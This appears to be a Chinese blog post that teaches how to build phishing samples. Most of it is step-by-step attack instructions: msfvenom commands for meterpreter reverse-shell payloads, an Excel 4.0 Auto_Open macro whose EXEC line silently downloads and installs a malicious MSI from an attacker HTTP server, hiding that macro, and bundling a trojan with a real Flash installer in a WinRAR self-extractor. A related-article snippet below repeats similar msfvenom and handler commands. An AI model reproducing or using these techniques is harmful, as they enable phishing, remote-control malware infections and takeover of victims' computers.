社会工程学钓鱼样本的制作

最新推荐文章于 2024-09-05 17:22:26 发布
最新推荐文章于 2024-09-05 17:22:26 发布
阅读量246 收藏 3
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72482018/article/details/134899504
版权

广诚在线视频 linux提权

excel宏

msf生成恶意的msi文件

msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi

然后msf建立监听

然后python在具有恶意的msi的文件夹下开启http服务

然后开始制作excel

这里改一个更加容易让受害者相信的文件名

加点内容更容易上钩

选择插入宏表

第一行输入

=EXEC("msiexec /q /i http://192.168.100.132/diaoyexl.msi")

#记得把上面的ip改成你kali  http服务的ip

表示调用服务器上的msi

第二行输入

=HALT()

标识Excel 4.0宏结束

在A1 左上角改成Auto_Open让exl打开时候自动运行宏,然后回车

然后隐藏宏,另存为启用宏的工作表

保存成功后上传到肉鸡 win7虚拟机

运行后启用宏

成功

常规软件捆绑远控木马进行钓鱼

制作msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe

把木马和正常的flash 进行压缩

放在一起用winrar添加到压缩文件

这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序

启动msf进行监听

然后把做好的恶意flash放到win7虚拟机中运行

点击安装后就会上线了

过一会就会正常安装

chnpla4
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[系统安全] 五十八.恶意软件分析 (10)利用火绒安全实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-26 366
前文介绍了利用MS Defender实现恶意样本家族批量标注。这篇文章将讲解如何利用火绒实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
[系统安全] 五十七.恶意软件分析 (9)利用MS Defender实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-18 429
前文介绍了IDA Python配置过程和基础用法,然后尝试提取恶意软件的控制流图(CFG)。这篇文章将讲解如何利用MS Defender实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
制作简单的钓鱼样本
weixin_63715632的博客
12-07 148
python在具有恶意的msi的文件夹下开启http服务。把做好的恶意flash放到win7虚拟机中运行。win7 运行自解压后就获取到shell。放在一起用winrar添加到压缩文件。把木马和正常的flash 进行压缩。目标访问excel且启用宏功能时。标识Excel 4.0宏结束。表示调用服务器上的msi。将名字改为容易混淆的。起一个容易混淆的名字。
php 调用 excel 宏_原创干货 | excel钓鱼简介
weixin_39663729的博客
12-06 657
点击关注了解更多精彩内容!!excel钓鱼简介关于excel钓鱼是由来已久的一种攻击方式,目前本人已知的方法有:office宏攻击DDE攻击power query DDE(DDE的一种)office宏攻击宏攻击,一种古老的攻击手法,依靠在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的宏攻击。然后按照步骤加入宏,用户在启用宏的情况下即可顺利上线。DDE...
常见的钓鱼招式,可千万别入坑哦
HBohan的博客
10-19 415
OFFICE 【查看资料】 Office安全保护机制 受保护的视图 为了保护计算机不受office病毒侵害,微软设计了一个收保护视图,将所有可疑的office文件以只读方式打开,在该模式下多数编辑功能被禁用。文件呗以受保护视图打开的情况有如下几种 文件是从 Internet 位置打开的 文件是通过 Outlook 附件的方式接收的,并且计算机策略将发件人定义为不安全 文件是从不安全的位置打开的 文件被文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDr.
社会工程学钓鱼attack常见手段和方法
weixin_51339377的博客
03-27 1324
1.excel宏钓鱼 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.186 lport=4444 -f msi -o hack.msi msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost=192.168.1.186 show options exploit 将msi粘贴到/var/www/htm..
Excel-Phish:网络钓鱼密码保护的Excel文件
04-24
Excel钓鱼 网络钓鱼密码保护的Excel文件-由和。 相应的博客文章可以在这里找到:
Excel的IYQ钓鱼
dda6607的博客
05-20 712
Excel的IYQ钓鱼 0x00 环境准备 操作系统:windows7 microsoft office版本:office 2010 0x01 了解IYQ的基本概念 可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用e...
苏涛:对抗样本技术在互联网安全领域的应用
DataFun_Hoh的博客
06-09 693
导读: 验证码作为网络安全的第一道屏障,其重要程度不言而喻。当前,卷积神经网络的高速发展使得许多验证码的安全性大大降低,一些新型验证码甚至选择牺牲可用性从而保证安全性。针对对抗样本技术的研究,给验证码领域带来了新的契机,并已应用于验证码反识别当中,为这场旷日持久攻防对抗注入了新的活力。 分享内容包括三大方面: 对抗样本介绍 极验对抗样本技术探索与应用 后续的工作与思考 - 01 对抗样本介绍 1. 什么是对抗样本 对抗样本 ( Adversarial Examples ) 的概念最早是 Chris..
对某单位的 APT 攻击样本分析
晓得哥的博客
08-14 1152
作者:SungLin@知道创宇404实验室 时间:2019年7月30日 一.恶意邮件样本的信息与背景 在六月份的某单位HW行动中,知道创宇HW安全团队通过创宇云图APT威胁感知系统并结合腾讯御点终端安全管理系统成功处置了一起APT攻击事件。 7月份对同一样本的补充截图如下: 在本次APT攻击中,攻击者通过发送鱼叉式钓鱼邮件,配合社会工程学手段诱导用户运行宏代码,进而下载尾部带有恶意payload...
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
热门推荐
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 251
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
【网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
goldfish8848的博客
08-31 1524
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
浅谈网络安全的认识与学习规划
最新发布
qq_201729558
09-05 447
本文主要介绍网络安全认识与学习规划
【补-网络安全】日常运维(二)终端端口占用排查
Ryoujou的博客
09-02 260
端口占用及开放情况
全球性“微软蓝屏”事件的深思:网络安全与系统稳定性的挑战与应对
图灵追幕者博客录
09-05 790
近日,由于微软视窗系统软件更新引发的全球性“微软蓝屏”事件,成为科技领域的热点新闻。这次事件不仅影响了全球约850万台设备,波及航空、医疗、传媒等关键行业,还导致美国超过2.3万架次航班延误。如此规模的系统中断,再次将网络安全与系统稳定性的问题推上了风口浪尖。这次事件为我们敲响了警钟,提醒我们必须更加重视网络安全和系统稳定性。那么,如何构建一个更加稳固和安全的网络环境?在网络安全和系统稳定性方面,我们应采取哪些措施?
网络安全售前入门10安全服务——安全培训服务
打工人
09-02 1083
对企业人员进行安全意识培训,提高企业人员的安全意识。应对信息安全风险能力、信息系统安全运维水平,降低信息系统安全风险的重要工作,是《网络安全法》的合规性要求。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1548
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全售前入门08安全服务——Web漏洞扫描服务
打工人
08-31 701
Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASP TOP 10等主流安全漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值